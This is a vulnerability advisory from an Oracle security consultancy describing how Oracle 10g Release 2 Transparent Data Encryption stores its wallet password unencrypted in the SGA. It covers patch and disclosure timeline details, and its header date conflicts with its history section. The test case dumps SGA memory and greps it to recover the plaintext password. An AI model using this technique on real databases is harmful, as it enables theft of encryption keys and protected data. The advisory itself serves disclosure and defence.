Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
|
Transparent Data Encryption stores key unencrypted in the SGA
Name |
Transparent Data Encryption stores key unencrypted in the SGA |
Systems Affected |
Oracle Database 10g Release 2 |
Severity |
High Risk |
Category |
Information disclosure |
Vendor URL |
http://www.oracle.com/ |
Author |
Alexander Kornbrust (ak at red-database-security.com) |
Date |
17 January 2005 (V 1.00) |
Oracle Bugno |
5802173 |
Time to fix |
190 days |
Details
The Oracle security feature "Transparent Data Encryption" is storing the masterkey unencrypted
in the SGA. A skilled attacker or non-security DBA can retrieve the plaintext masterkey.
Test case
SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";
System altered.
SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release 10.2.0.1.0
Production With the Partitioning, OLAP and Data Mining options
[oracle@ora10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin
[oracle@ora10201 /]$ cd /tmp
[oracle@ora10201 /]$ dumpsga
[oracle@ora10201 /]$ strings * | grep -iH secretpassword
secretpassword
secretpassword
secretpassword
[] Excerpt from the SGA
/oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@ôçd$d$^@?y*cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0êd$d¤d$-
^@^@0êd$L4^L¿^Xp /¹]/º<8f>^Dsecretpassword^@^M^U^B^@èd$´4^Lfile:/oracle/10.2.0/admin/ora10201/wallet
[]
Patch Information
Oracle fixed this issue with the patches from the critical patch update january 2006 for Oracle 10g Release 2.
History
11-jul-2005 Oracle secalert was informed
12-jul-2005 Bug confirmed
17-jan-2006 Oracle published the Critical Patch Update January 2006 (CPU January 2006)
17-jan-2006 Red-Database-Security published this advisory
© 2006 by Red-Database-Security GmbH - last update 17-jan-2006
|
Oracle Transparent Data Encryption (TDE)
Oracle Transparent Data Encryption enables you to encrypt data in columns
without having to manage the encryption key. Businesses can protect
sensitive data in their databases without having to make changes to
their applications..
Oracle Transparent Data Encryption is a new feature of Oracle 10g Release 2 and part of the Oracle Advanced Security Option (ASO).
|